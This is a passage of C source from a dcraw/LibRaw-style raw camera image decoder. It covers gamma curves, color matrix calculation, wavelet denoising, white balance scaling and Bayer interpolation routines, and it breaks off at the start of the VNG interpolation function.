0xe5,0xe9,0x61,0x47,0x2f,0x35,0x7f,0x17,0x7f,0xef,0x7f,0x95,0x95,0x71,0xd3,0xa3,
0x0b,0x71,0xa3,0xad,0x0b,0x3b,0xb5,0xfb,0xa3,0xbf,0x4f,0x83,0x1d,0xad,0xe9,0x2f,
0x71,0x65,0xa3,0xe5,0x07,0x35,0x3d,0x0d,0xb5,0xe9,0xe5,0x47,0x3b,0x9d,0xef,0x35,
0xa3,0xbf,0xb3,0xdf,0x53,0xd3,0x97,0x53,0x49,0x71,0x07,0x35,0x61,0x71,0x2f,0x43,
0x2f,0x11,0xdf,0x17,0x97,0xfb,0x95,0x3b,0x7f,0x6b,0xd3,0x25,0xbf,0xad,0xc7,0xc5,
0xc5,0xb5,0x8b,0xef,0x2f,0xd3,0x07,0x6b,0x25,0x49,0x95,0x25,0x49,0x6d,0x71,0xc7 },
{ 0xa7,0xbc,0xc9,0xad,0x91,0xdf,0x85,0xe5,0xd4,0x78,0xd5,0x17,0x46,0x7c,0x29,0x4c,
0x4d,0x03,0xe9,0x25,0x68,0x11,0x86,0xb3,0xbd,0xf7,0x6f,0x61,0x22,0xa2,0x26,0x34,
0x2a,0xbe,0x1e,0x46,0x14,0x68,0x9d,0x44,0x18,0xc2,0x40,0xf4,0x7e,0x5f,0x1b,0xad,
0x0b,0x94,0xb6,0x67,0xb4,0x0b,0xe1,0xea,0x95,0x9c,0x66,0xdc,0xe7,0x5d,0x6c,0x05,
0xda,0xd5,0xdf,0x7a,0xef,0xf6,0xdb,0x1f,0x82,0x4c,0xc0,0x68,0x47,0xa1,0xbd,0xee,
0x39,0x50,0x56,0x4a,0xdd,0xdf,0xa5,0xf8,0xc6,0xda,0xca,0x90,0xca,0x01,0x42,0x9d,
0x8b,0x0c,0x73,0x43,0x75,0x05,0x94,0xde,0x24,0xb3,0x80,0x34,0xe5,0x2c,0xdc,0x9b,
0x3f,0xca,0x33,0x45,0xd0,0xdb,0x5f,0xf5,0x52,0xc3,0x21,0xda,0xe2,0x22,0x72,0x6b,
0x3e,0xd0,0x5b,0xa8,0x87,0x8c,0x06,0x5d,0x0f,0xdd,0x09,0x19,0x93,0xd0,0xb9,0xfc,
0x8b,0x0f,0x84,0x60,0x33,0x1c,0x9b,0x45,0xf1,0xf0,0xa3,0x94,0x3a,0x12,0x77,0x33,
0x4d,0x44,0x78,0x28,0x3c,0x9e,0xfd,0x65,0x57,0x16,0x94,0x6b,0xfb,0x59,0xd0,0xc8,
0x22,0x36,0xdb,0xd2,0x63,0x98,0x43,0xa1,0x04,0x87,0x86,0xf7,0xa6,0x26,0xbb,0xd6,
0x59,0x4d,0xbf,0x6a,0x2e,0xaa,0x2b,0xef,0xe6,0x78,0xb6,0x4e,0xe0,0x2f,0xdc,0x7c,
0xbe,0x57,0x19,0x32,0x7e,0x2a,0xd0,0xb8,0xba,0x29,0x00,0x3c,0x52,0x7d,0xa8,0x49,
0x3b,0x2d,0xeb,0x25,0x49,0xfa,0xa3,0xaa,0x39,0xa7,0xc5,0xa7,0x50,0x11,0x36,0xfb,
0xc6,0x67,0x4a,0xf5,0xa5,0x12,0x65,0x7e,0xb0,0xdf,0xaf,0x4e,0xb3,0x61,0x7f,0x2f } };
void CLASS gamma_curve (double pwr, double ts, int mode, int imax)
{
int i;
double g[6], bnd[2]={0,0}, r;
g[0] = pwr;
g[1] = ts;
g[2] = g[3] = g[4] = 0;
bnd[g[1] >= 1] = 1;
if (g[1] && (g[1]-1)*(g[0]-1) <= 0) {
for (i=0; i < 48; i++) {
g[2] = (bnd[0] + bnd[1])/2;
if (g[0]) bnd[(pow(g[2]/g[1],-g[0]) - 1)/g[0] - 1/g[2] > -1] = g[2];
else bnd[g[2]/exp(1-1/g[2]) < g[1]] = g[2];
}
g[3] = g[2] / g[1];
if (g[0]) g[4] = g[2] * (1/g[0] - 1);
}
if (g[0]) g[5] = 1 / (g[1]*SQR(g[3])/2 - g[4]*(1 - g[3]) +
(1 - pow(g[3],1+g[0]))*(1 + g[4])/(1 + g[0])) - 1;
else g[5] = 1 / (g[1]*SQR(g[3])/2 + 1
- g[2] - g[3] - g[2]*g[3]*(log(g[3]) - 1)) - 1;
if (!mode--) {
memcpy (gamm, g, sizeof gamm);
return;
}
for (i=0; i < 0x10000; i++) {
curve[i] = 0xffff;
if ((r = (double) i / imax) < 1)
curve[i] = 0x10000 * ( mode
? (r < g[3] ? r*g[1] : (g[0] ? pow( r,g[0])*(1+g[4])-g[4] : log(r)*g[2]+1))
: (r < g[2] ? r/g[1] : (g[0] ? pow((r+g[4])/(1+g[4]),1/g[0]) : exp((r-1)/g[2]))));
}
}
void CLASS pseudoinverse (double (*in)[3], double (*out)[3], int size)
{
double work[3][6], num;
int i, j, k;
for (i=0; i < 3; i++) {
for (j=0; j < 6; j++)
work[i][j] = j == i+3;
for (j=0; j < 3; j++)
for (k=0; k < size; k++)
work[i][j] += in[k][i] * in[k][j];
}
for (i=0; i < 3; i++) {
num = work[i][i];
for (j=0; j < 6; j++)
work[i][j] /= num;
for (k=0; k < 3; k++) {
if (k==i) continue;
num = work[k][i];
for (j=0; j < 6; j++)
work[k][j] -= work[i][j] * num;
}
}
for (i=0; i < size; i++)
for (j=0; j < 3; j++)
for (out[i][j]=k=0; k < 3; k++)
out[i][j] += work[j][k+3] * in[i][k];
}
void CLASS cam_xyz_coeff (float _rgb_cam[3][4], double cam_xyz[4][3])
{
double cam_rgb[4][3], inverse[4][3], num;
int i, j, k;
for (i=0; i < colors; i++) /* Multiply out XYZ colorspace */
for (j=0; j < 3; j++)
for (cam_rgb[i][j] = k=0; k < 3; k++)
cam_rgb[i][j] += cam_xyz[i][k] * xyz_rgb[k][j];
for (i=0; i < colors; i++) { /* Normalize cam_rgb so that */
for (num=j=0; j < 3; j++) /* cam_rgb * (1,1,1) is (1,1,1,1) */
num += cam_rgb[i][j];
if(num > 0.00001)
{
for (j=0; j < 3; j++)
cam_rgb[i][j] /= num;
pre_mul[i] = 1 / num;
}
else
{
for (j=0; j < 3; j++)
cam_rgb[i][j] = 0.0;
pre_mul[i] = 1.0;
}
}
pseudoinverse (cam_rgb, inverse, colors);
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
_rgb_cam[i][j] = inverse[j][i];
}
#ifdef COLORCHECK
void CLASS colorcheck()
{
#define NSQ 24
// Coordinates of the GretagMacbeth ColorChecker squares
// width, height, 1st_column, 1st_row
int cut[NSQ][4]; // you must set these
// ColorChecker Chart under 6500-kelvin illumination
static const double gmb_xyY[NSQ][3] = {
{ 0.400, 0.350, 10.1 }, // Dark Skin
{ 0.377, 0.345, 35.8 }, // Light Skin
{ 0.247, 0.251, 19.3 }, // Blue Sky
{ 0.337, 0.422, 13.3 }, // Foliage
{ 0.265, 0.240, 24.3 }, // Blue Flower
{ 0.261, 0.343, 43.1 }, // Bluish Green
{ 0.506, 0.407, 30.1 }, // Orange
{ 0.211, 0.175, 12.0 }, // Purplish Blue
{ 0.453, 0.306, 19.8 }, // Moderate Red
{ 0.285, 0.202, 6.6 }, // Purple
{ 0.380, 0.489, 44.3 }, // Yellow Green
{ 0.473, 0.438, 43.1 }, // Orange Yellow
{ 0.187, 0.129, 6.1 }, // Blue
{ 0.305, 0.478, 23.4 }, // Green
{ 0.539, 0.313, 12.0 }, // Red
{ 0.448, 0.470, 59.1 }, // Yellow
{ 0.364, 0.233, 19.8 }, // Magenta
{ 0.196, 0.252, 19.8 }, // Cyan
{ 0.310, 0.316, 90.0 }, // White
{ 0.310, 0.316, 59.1 }, // Neutral 8
{ 0.310, 0.316, 36.2 }, // Neutral 6.5
{ 0.310, 0.316, 19.8 }, // Neutral 5
{ 0.310, 0.316, 9.0 }, // Neutral 3.5
{ 0.310, 0.316, 3.1 } }; // Black
double gmb_cam[NSQ][4], gmb_xyz[NSQ][3];
double inverse[NSQ][3], cam_xyz[4][3], balance[4], num;
int c, i, j, k, sq, row, col, pass, count[4];
memset (gmb_cam, 0, sizeof gmb_cam);
for (sq=0; sq < NSQ; sq++) {
FORCC count[c] = 0;
for (row=cut[sq][3]; row < cut[sq][3]+cut[sq][1]; row++)
for (col=cut[sq][2]; col < cut[sq][2]+cut[sq][0]; col++) {
c = FC(row,col);
if (c >= colors) c -= 2;
gmb_cam[sq][c] += BAYER2(row,col);
BAYER2(row,col) = black + (BAYER2(row,col)-black)/2;
count[c]++;
}
FORCC gmb_cam[sq][c] = gmb_cam[sq][c]/count[c] - black;
gmb_xyz[sq][0] = gmb_xyY[sq][2] * gmb_xyY[sq][0] / gmb_xyY[sq][1];
gmb_xyz[sq][1] = gmb_xyY[sq][2];
gmb_xyz[sq][2] = gmb_xyY[sq][2] *
(1 - gmb_xyY[sq][0] - gmb_xyY[sq][1]) / gmb_xyY[sq][1];
}
pseudoinverse (gmb_xyz, inverse, NSQ);
for (pass=0; pass < 2; pass++) {
for (raw_color = i=0; i < colors; i++)
for (j=0; j < 3; j++)
for (cam_xyz[i][j] = k=0; k < NSQ; k++)
cam_xyz[i][j] += gmb_cam[k][i] * inverse[k][j];
cam_xyz_coeff (rgb_cam, cam_xyz);
FORCC balance[c] = pre_mul[c] * gmb_cam[20][c];
for (sq=0; sq < NSQ; sq++)
FORCC gmb_cam[sq][c] *= balance[c];
}
if (verbose) {
printf (" { \"%s %s\", %d,\n\t{", make, model, black);
num = 10000 / (cam_xyz[1][0] + cam_xyz[1][1] + cam_xyz[1][2]);
FORCC for (j=0; j < 3; j++)
printf ("%c%d", (c | j) ? ',':' ', (int) (cam_xyz[c][j] * num + 0.5));
puts (" } },");
}
#undef NSQ
}
#endif
void CLASS hat_transform (float *temp, float *base, int st, int size, int sc)
{
int i;
for (i=0; i < sc; i++)
temp[i] = 2*base[st*i] + base[st*(sc-i)] + base[st*(i+sc)];
for (; i+sc < size; i++)
temp[i] = 2*base[st*i] + base[st*(i-sc)] + base[st*(i+sc)];
for (; i < size; i++)
temp[i] = 2*base[st*i] + base[st*(i-sc)] + base[st*(2*size-2-(i+sc))];
}
#if !defined(LIBRAW_USE_OPENMP)
void CLASS wavelet_denoise()
{
float *fimg=0, *temp, thold, mul[2], avg, diff;
int scale=1, size, lev, hpass, lpass, row, col, nc, c, i, wlast, blk[2];
ushort *window[4];
static const float noise[] =
{ 0.8002,0.2735,0.1202,0.0585,0.0291,0.0152,0.0080,0.0044 };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Wavelet denoising...\n"));
#endif
while (maximum << scale < 0x10000) scale++;
maximum <<= --scale;
black <<= scale;
FORC4 cblack[c] <<= scale;
if ((size = iheight*iwidth) < 0x15550000)
fimg = (float *) malloc ((size*3 + iheight + iwidth) * sizeof *fimg);
merror (fimg, "wavelet_denoise()");
temp = fimg + size*3;
if ((nc = colors) == 3 && filters) nc++;
FORC(nc) { /* denoise R,G1,B,G3 individually */
for (i=0; i < size; i++)
fimg[i] = 256 * sqrt((double)(image[i][c] << scale));
for (hpass=lev=0; lev < 5; lev++) {
lpass = size*((lev & 1)+1);
for (row=0; row < iheight; row++) {
hat_transform (temp, fimg+hpass+row*iwidth, 1, iwidth, 1 << lev);
for (col=0; col < iwidth; col++)
fimg[lpass + row*iwidth + col] = temp[col] * 0.25;
}
for (col=0; col < iwidth; col++) {
hat_transform (temp, fimg+lpass+col, iwidth, iheight, 1 << lev);
for (row=0; row < iheight; row++)
fimg[lpass + row*iwidth + col] = temp[row] * 0.25;
}
thold = threshold * noise[lev];
for (i=0; i < size; i++) {
fimg[hpass+i] -= fimg[lpass+i];
if (fimg[hpass+i] < -thold) fimg[hpass+i] += thold;
else if (fimg[hpass+i] > thold) fimg[hpass+i] -= thold;
else fimg[hpass+i] = 0;
if (hpass) fimg[i] += fimg[hpass+i];
}
hpass = lpass;
}
for (i=0; i < size; i++)
image[i][c] = CLIP(SQR(fimg[i]+fimg[lpass+i])/0x10000);
}
if (filters && colors == 3) { /* pull G1 and G3 closer together */
for (row=0; row < 2; row++) {
mul[row] = 0.125 * pre_mul[FC(row+1,0) | 1] / pre_mul[FC(row,0) | 1];
blk[row] = cblack[FC(row,0) | 1];
}
for (i=0; i < 4; i++)
window[i] = (ushort *) fimg + width*i;
for (wlast=-1, row=1; row < height-1; row++) {
while (wlast < row+1) {
for (wlast++, i=0; i < 4; i++)
window[(i+3) & 3] = window[i];
for (col = FC(wlast,1) & 1; col < width; col+=2)
window[2][col] = BAYER(wlast,col);
}
thold = threshold/512;
for (col = (FC(row,0) & 1)+1; col < width-1; col+=2) {
avg = ( window[0][col-1] + window[0][col+1] +
window[2][col-1] + window[2][col+1] - blk[~row & 1]*4 )
* mul[row & 1] + (window[1][col] + blk[row & 1]) * 0.5;
avg = avg < 0 ? 0 : sqrt(avg);
diff = sqrt((double)BAYER(row,col)) - avg;
if (diff < -thold) diff += thold;
else if (diff > thold) diff -= thold;
else diff = 0;
BAYER(row,col) = CLIP(SQR(avg+diff) + 0.5);
}
}
}
free (fimg);
}
#else /* LIBRAW_USE_OPENMP */
void CLASS wavelet_denoise()
{
float *fimg=0, *temp, thold, mul[2], avg, diff;
int scale=1, size, lev, hpass, lpass, row, col, nc, c, i, wlast, blk[2];
ushort *window[4];
static const float noise[] =
{ 0.8002,0.2735,0.1202,0.0585,0.0291,0.0152,0.0080,0.0044 };
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Wavelet denoising...\n"));
#endif
while (maximum << scale < 0x10000) scale++;
maximum <<= --scale;
black <<= scale;
FORC4 cblack[c] <<= scale;
if ((size = iheight*iwidth) < 0x15550000)
fimg = (float *) malloc ((size*3 + iheight + iwidth) * sizeof *fimg);
merror (fimg, "wavelet_denoise()");
temp = fimg + size*3;
if ((nc = colors) == 3 && filters) nc++;
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp parallel default(shared) private(i,col,row,thold,lev,lpass,hpass,temp,c) firstprivate(scale,size)
#endif
{
temp = (float*)malloc( (iheight + iwidth) * sizeof *fimg);
FORC(nc) { /* denoise R,G1,B,G3 individually */
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++)
fimg[i] = 256 * sqrt((double)(image[i][c] << scale));
for (hpass=lev=0; lev < 5; lev++) {
lpass = size*((lev & 1)+1);
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (row=0; row < iheight; row++) {
hat_transform (temp, fimg+hpass+row*iwidth, 1, iwidth, 1 << lev);
for (col=0; col < iwidth; col++)
fimg[lpass + row*iwidth + col] = temp[col] * 0.25;
}
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (col=0; col < iwidth; col++) {
hat_transform (temp, fimg+lpass+col, iwidth, iheight, 1 << lev);
for (row=0; row < iheight; row++)
fimg[lpass + row*iwidth + col] = temp[row] * 0.25;
}
thold = threshold * noise[lev];
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++) {
fimg[hpass+i] -= fimg[lpass+i];
if (fimg[hpass+i] < -thold) fimg[hpass+i] += thold;
else if (fimg[hpass+i] > thold) fimg[hpass+i] -= thold;
else fimg[hpass+i] = 0;
if (hpass) fimg[i] += fimg[hpass+i];
}
hpass = lpass;
}
#ifdef LIBRAW_LIBRARY_BUILD
#pragma omp for
#endif
for (i=0; i < size; i++)
image[i][c] = CLIP(SQR(fimg[i]+fimg[lpass+i])/0x10000);
}
free(temp);
} /* end omp parallel */
/* the following loops are hard to parallize, no idea yes,
* problem is wlast which is carrying dependency
* second part should be easyer, but did not yet get it right.
*/
if (filters && colors == 3) { /* pull G1 and G3 closer together */
for (row=0; row < 2; row++){
mul[row] = 0.125 * pre_mul[FC(row+1,0) | 1] / pre_mul[FC(row,0) | 1];
blk[row] = cblack[FC(row,0) | 1];
}
for (i=0; i < 4; i++)
window[i] = (ushort *) fimg + width*i;
for (wlast=-1, row=1; row < height-1; row++) {
while (wlast < row+1) {
for (wlast++, i=0; i < 4; i++)
window[(i+3) & 3] = window[i];
for (col = FC(wlast,1) & 1; col < width; col+=2)
window[2][col] = BAYER(wlast,col);
}
thold = threshold/512;
for (col = (FC(row,0) & 1)+1; col < width-1; col+=2) {
avg = ( window[0][col-1] + window[0][col+1] +
window[2][col-1] + window[2][col+1] - blk[~row & 1]*4 )
* mul[row & 1] + (window[1][col] + blk[row & 1]) * 0.5;
avg = avg < 0 ? 0 : sqrt(avg);
diff = sqrt((double)BAYER(row,col)) - avg;
if (diff < -thold) diff += thold;
else if (diff > thold) diff -= thold;
else diff = 0;
BAYER(row,col) = CLIP(SQR(avg+diff) + 0.5);
}
}
}
free (fimg);
}
#endif
// green equilibration
void CLASS green_matching()
{
int i,j;
double m1,m2,c1,c2;
int o1_1,o1_2,o1_3,o1_4;
int o2_1,o2_2,o2_3,o2_4;
ushort (*img)[4];
const int margin = 3;
int oj = 2, oi = 2;
float f;
const float thr = 0.01f;
if(half_size || shrink) return;
if(FC(oj, oi) != 3) oj++;
if(FC(oj, oi) != 3) oi++;
if(FC(oj, oi) != 3) oj--;
img = (ushort (*)[4]) calloc (height*width, sizeof *image);
merror (img, "green_matching()");
memcpy(img,image,height*width*sizeof *image);
for(j=oj;j<height-margin;j+=2)
for(i=oi;i<width-margin;i+=2){
o1_1=img[(j-1)*width+i-1][1];
o1_2=img[(j-1)*width+i+1][1];
o1_3=img[(j+1)*width+i-1][1];
o1_4=img[(j+1)*width+i+1][1];
o2_1=img[(j-2)*width+i][3];
o2_2=img[(j+2)*width+i][3];
o2_3=img[j*width+i-2][3];
o2_4=img[j*width+i+2][3];
m1=(o1_1+o1_2+o1_3+o1_4)/4.0;
m2=(o2_1+o2_2+o2_3+o2_4)/4.0;
c1=(abs(o1_1-o1_2)+abs(o1_1-o1_3)+abs(o1_1-o1_4)+abs(o1_2-o1_3)+abs(o1_3-o1_4)+abs(o1_2-o1_4))/6.0;
c2=(abs(o2_1-o2_2)+abs(o2_1-o2_3)+abs(o2_1-o2_4)+abs(o2_2-o2_3)+abs(o2_3-o2_4)+abs(o2_2-o2_4))/6.0;
if((img[j*width+i][3]<maximum*0.95)&&(c1<maximum*thr)&&(c2<maximum*thr))
{
f = image[j*width+i][3]*m1/m2;
image[j*width+i][3]=f>0xffff?0xffff:f;
}
}
free(img);
}
void CLASS scale_colors()
{
unsigned bottom, right, size, row, col, ur, uc, i, x, y, c, sum[8];
int val, dark, sat;
double dsum[8], dmin, dmax;
float scale_mul[4], fr, fc;
ushort *img=0, *pix;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_SCALE_COLORS,0,2);
#endif
if (user_mul[0])
memcpy (pre_mul, user_mul, sizeof pre_mul);
if (use_auto_wb || (use_camera_wb && cam_mul[0] == -1)) {
memset (dsum, 0, sizeof dsum);
bottom = MIN (greybox[1]+greybox[3], height);
right = MIN (greybox[0]+greybox[2], width);
for (row=greybox[1]; row < bottom; row += 8)
for (col=greybox[0]; col < right; col += 8) {
memset (sum, 0, sizeof sum);
for (y=row; y < row+8 && y < bottom; y++)
for (x=col; x < col+8 && x < right; x++)
FORC4 {
if (filters) {
c = fcol(y,x);
val = BAYER2(y,x);
} else
val = image[y*width+x][c];
if (val > maximum-25) goto skip_block;
if ((val -= cblack[c]) < 0) val = 0;
sum[c] += val;
sum[c+4]++;
if (filters) break;
}
FORC(8) dsum[c] += sum[c];
skip_block: ;
}
FORC4 if (dsum[c]) pre_mul[c] = dsum[c+4] / dsum[c];
}
if (use_camera_wb && cam_mul[0] != -1) {
memset (sum, 0, sizeof sum);
for (row=0; row < 8; row++)
for (col=0; col < 8; col++) {
c = FC(row,col);
if ((val = white[row][col] - cblack[c]) > 0)
sum[c] += val;
sum[c+4]++;
}
#ifdef LIBRAW_LIBRARY_BUILD
if(load_raw == &LibRaw::nikon_load_sraw)
{
// Nikon sRAW: camera WB already applied:
pre_mul[0]=pre_mul[1]=pre_mul[2]=pre_mul[3]=1.0;
}
else
#endif
if (sum[0] && sum[1] && sum[2] && sum[3])
FORC4 pre_mul[c] = (float) sum[c+4] / sum[c];
else if (cam_mul[0] && cam_mul[2])
memcpy (pre_mul, cam_mul, sizeof pre_mul);
else
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_CAMERA_WB;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Cannot use camera white balance.\n"), ifname);
#endif
}
}
#ifdef LIBRAW_LIBRARY_BUILD
// Nikon sRAW, daylight
if (load_raw == &LibRaw::nikon_load_sraw
&& !use_camera_wb && !use_auto_wb
&& cam_mul[0] > 0.001f && cam_mul[1] > 0.001f && cam_mul[2] > 0.001f )
{
for(c=0;c<3;c++)
pre_mul[c]/=cam_mul[c];
}
#endif
if (pre_mul[1] == 0) pre_mul[1] = 1;
if (pre_mul[3] == 0) pre_mul[3] = colors < 4 ? pre_mul[1] : 1;
dark = black;
sat = maximum;
if (threshold) wavelet_denoise();
maximum -= black;
for (dmin=DBL_MAX, dmax=c=0; c < 4; c++) {
if (dmin > pre_mul[c])
dmin = pre_mul[c];
if (dmax < pre_mul[c])
dmax = pre_mul[c];
}
if (!highlight) dmax = dmin;
FORC4 scale_mul[c] = (pre_mul[c] /= dmax) * 65535.0 / maximum;
#ifdef DCRAW_VERBOSE
if (verbose) {
fprintf (stderr,
_("Scaling with darkness %d, saturation %d, and\nmultipliers"), dark, sat);
FORC4 fprintf (stderr, " %f", pre_mul[c]);
fputc ('\n', stderr);
}
#endif
if (filters > 1000 && (cblack[4]+1)/2 == 1 && (cblack[5]+1)/2 == 1) {
FORC4 cblack[FC(c/2,c%2)] +=
cblack[6 + c/2 % cblack[4] * cblack[5] + c%2 % cblack[5]];
cblack[4] = cblack[5] = 0;
}
size = iheight*iwidth;
#ifdef LIBRAW_LIBRARY_BUILD
scale_colors_loop(scale_mul);
#else
for (i=0; i < size*4; i++) {
if (!(val = ((ushort *)image)[i])) continue;
if (cblack[4] && cblack[5])
val -= cblack[6 + i/4 / iwidth % cblack[4] * cblack[5] +
i/4 % iwidth % cblack[5]];
val -= cblack[i & 3];
val *= scale_mul[i & 3];
((ushort *)image)[i] = CLIP(val);
}
#endif
if ((aber[0] != 1 || aber[2] != 1) && colors == 3) {
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Correcting chromatic aberration...\n"));
#endif
for (c=0; c < 4; c+=2) {
if (aber[c] == 1) continue;
img = (ushort *) malloc (size * sizeof *img);
merror (img, "scale_colors()");
for (i=0; i < size; i++)
img[i] = image[i][c];
for (row=0; row < iheight; row++) {
ur = fr = (row - iheight*0.5) * aber[c] + iheight*0.5;
if (ur > iheight-2) continue;
fr -= ur;
for (col=0; col < iwidth; col++) {
uc = fc = (col - iwidth*0.5) * aber[c] + iwidth*0.5;
if (uc > iwidth-2) continue;
fc -= uc;
pix = img + ur*iwidth + uc;
image[row*iwidth+col][c] =
(pix[ 0]*(1-fc) + pix[ 1]*fc) * (1-fr) +
(pix[iwidth]*(1-fc) + pix[iwidth+1]*fc) * fr;
}
}
free(img);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_SCALE_COLORS,1,2);
#endif
}
void CLASS pre_interpolate()
{
ushort (*img)[4];
int row, col, c;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_PRE_INTERPOLATE,0,2);
#endif
if (shrink) {
if (half_size) {
height = iheight;
width = iwidth;
if (filters == 9) {
for (row=0; row < 3; row++)
for (col=1; col < 4; col++)
if (!(image[row*width+col][0] | image[row*width+col][2]))
goto break2; break2:
for ( ; row < height; row+=3)
for (col=(col-1)%3+1; col < width-1; col+=3) {
img = image + row*width+col;
for (c=0; c < 3; c+=2)
img[0][c] = (img[-1][c] + img[1][c]) >> 1;
}
}
} else {
img = (ushort (*)[4]) calloc (height, width*sizeof *img);
merror (img, "pre_interpolate()");
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
c = fcol(row,col);
img[row*width+col][c] = image[(row >> 1)*iwidth+(col >> 1)][c];
}
free (image);
image = img;
shrink = 0;
}
}
if (filters > 1000 && colors == 3) {
mix_green = four_color_rgb ^ half_size;
if (four_color_rgb | half_size) colors++;
else {
for (row = FC(1,0) >> 1; row < height; row+=2)
for (col = FC(row,1) & 1; col < width; col+=2)
image[row*width+col][1] = image[row*width+col][3];
filters &= ~((filters & 0x55555555) << 1);
}
}
if (half_size) filters = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_PRE_INTERPOLATE,1,2);
#endif
}
void CLASS border_interpolate (int border)
{
unsigned row, col, y, x, f, c, sum[8];
for (row=0; row < height; row++)
for (col=0; col < width; col++) {
if (col==border && row >= border && row < height-border)
col = width-border;
memset (sum, 0, sizeof sum);
for (y=row-1; y != row+2; y++)
for (x=col-1; x != col+2; x++)
if (y < height && x < width) {
f = fcol(y,x);
sum[f] += image[y*width+x][f];
sum[f+4]++;
}
f = fcol(row,col);
FORCC if (c != f && sum[c+4])
image[row*width+col][c] = sum[c] / sum[c+4];
}
}
void CLASS lin_interpolate_loop(int code[16][16][32],int size)
{
int row;
for (row=1; row < height-1; row++)
{
int col,*ip;
ushort *pix;
for (col=1; col < width-1; col++) {
int i;
int sum[4];
pix = image[row*width+col];
ip = code[row % size][col % size];
memset (sum, 0, sizeof sum);
for (i=*ip++; i--; ip+=3)
sum[ip[2]] += pix[ip[0]] << ip[1];
for (i=colors; --i; ip+=2)
pix[ip[0]] = sum[ip[0]] * ip[1] >> 8;
}
}
}
void CLASS lin_interpolate()
{
int code[16][16][32], size=16, *ip, sum[4];
int f, c, x, y, row, col, shift, color;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Bilinear interpolation...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,0,3);
#endif
if (filters == 9) size = 6;
border_interpolate(1);
for (row=0; row < size; row++)
for (col=0; col < size; col++) {
ip = code[row][col]+1;
f = fcol(row,col);
memset (sum, 0, sizeof sum);
for (y=-1; y <= 1; y++)
for (x=-1; x <= 1; x++) {
shift = (y==0) + (x==0);
color = fcol(row+y,col+x);
if (color == f) continue;
*ip++ = (width*y + x)*4 + color;
*ip++ = shift;
*ip++ = color;
sum[color] += 1 << shift;
}
code[row][col][0] = (ip - code[row][col]) / 3;
FORCC
if (c != f) {
*ip++ = c;
*ip++ = sum[c]>0?256 / sum[c]:0;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,1,3);
#endif
lin_interpolate_loop(code,size);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,2,3);
#endif
}
/*
This algorithm is officially called:
"Interpolation using a Threshold-based variable number of gradients"
described in http://scien.stanford.edu/pages/labsite/1999/psych221/projects/99/tingchen/algodep/vargra.html
I've extended the basic idea to work with non-Bayer filter arrays.
Gradients are numbered clockwise from NW=0 to W=7.
*/
void CLASS vng_interpolate()
{
static const signed char *cp, terms[] = {
-2,-2,+0,-1,0,0x01, -2,-2,+0,+0,1,0x01, -2,-1,-1,+0,0,0x01,
-2,-1,+0,-1,0,0x02, -2,-1,+0,+0,0,0x03, -2,-1,+0,+1,1,0x01,
-2,+0,+0,-1,0,0x06, -2,+0,+0,+0,1,0x02, -2,+0,+0,+1,0,0x03,
-2,+1,-1,+0,0,0x04, -2,+1,+0,-1,1,0x04, -2,+1,+0,+0,0,0x06,
-2,+1,+0,+1,0,0x02, -2,+2,+0,+0,1,0x04, -2,+2,+0,+1,0,0x04,
-1,-2,-1,+0,0,-128, -1,-2,+0,-1,0,0x01, -1,-2,+1,-1,0,0x01,
-1,-2,+1,+0,1,0x01, -1,-1,-1,+1,0,-120, -1,-1,+1,-2,0,0x40,
-1,-1,+1,-1,0,0x22, -1,-1,+1,+0,0,0x33, -1,-1,+1,+1,1,0x11,
-1,+0,-1,+2,0,0x08, -1,+0,+0,-1,0,0x44, -1,+0,+0,+1,0,0x11,
-1,+0,+1,-2,1,0x40, -1,+0,+1,-1,0,0x66, -1,+0,+1,+0,1,0x22,
-1,+0,+1,+1,0,0x33, -1,+0,+1,+2,1,0x10, -1,+1,+1,-1,1,0x44,
-1,+1,+1,+0,0,0x66, -1,+1,+1,+1,0,0x22, -1,+1,+1,+2,0,0x10,
-1,+2,+0,+1,0,0x04, -1,+2,+1,+0,1,0x04, -1,+2,+1,+1,0,0x04,
+0,-2,+0,+0,1,-128, +0,-1,+0,+1,1,-120, +0,-1,+1,-2,0,0x40,
+0,-1,+1,+0,0,0x11, +0,-1,+2,-2,0,0x40, +0,-1,+2,-1,0,0x20,
+0,-1,+2,+0,0,0x30, +0,-1,+2,+1,1,0x10, +0,+0,+0,+2,1,0x08,
+0,+0,+2,-2,1,0x40, +0,+0,+2,-1,0,0x60, +0,+0,+2,+0,1,0x20,
+0,+0,+2,+1,0,0x30, +0,+0,+2,+2,1,0x10, +0,+1,+1,+0,0,0x44,
+0,+1,+1,+2,0,0x10, +0,+1,+2,-1,1,0x40, +0,+1,+2,+0,0,0x60,
+0,+1,+2,+1,0,0x20, +0,+1,+2,+2,0,0x10, +1,-2,+1,+0,0,-128,
+1,-1,+1,+1,0,-120, +1,+0,+1,+2,0,0x08, +1,+0,+2,-1,0,0x40,
+1,+0,+2,+1,0,0x10
}, chood[] = { -1,-1, -1,0, -1,+1, 0,+1, +1,+1, +1,0, +1,-1, 0,-1 };
ushort (*brow[5])[4], *pix;
